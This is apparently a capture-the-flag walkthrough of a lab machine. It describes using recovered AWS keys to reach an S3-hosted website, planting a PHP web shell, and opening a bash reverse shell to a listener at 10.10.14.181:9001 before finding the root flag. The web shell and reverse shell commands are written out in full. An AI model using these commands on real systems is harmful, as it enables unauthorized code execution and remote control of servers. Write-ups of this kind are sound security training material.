Using Burpsuite and creating Reverse shell

I've got the keys and I can either take them back to my own machine and try top enumerate that way or I can see what else I can find from the AWS CLI

help screen, slight error

correct result. Looks like html entity encoding. I can decode this and see what I get

send to decoder

do a smart decode

Results

Can see the buckets name is website. Now if I want to interact with that I can do so through webshell s3api

Listing all the directories in s3 and then all the information in s3 website. Back to what we initially saw when exploring the site without the shell. which means i might need to write a php script for the server

echo "<?php system(\$_REQUEST['ippsec']); ?>" | base64

Script above is what I used output below is what was returned. base64 encoding is utilized to avoid bad characters, in this case the double quote.

Creating a file to save it to

Now that it was saved as a file with no errors. I want to copy it into the S3 website but under a different name. The matching bytes shows it was all copied with no problem

Now with "?ippsec=ls" added to the end we can see the code execution was successful

Now to get a reverse shell

nc -lvnp 9001

Now putting the rs code into burpsuite and I URL encoded it

bash -c 'bash -i >& /dev/tcp/10.10.14.181/9001 0>&1'

This confirms the shell is up and running

I can see all the ports currently listening. 127.0.0.1:8000 stands out because it is the only port listening on localhost.

root flag found

Took me a few tries to get the syntax right because I did not add terms or putty so tabs and directional keys to edit did not work.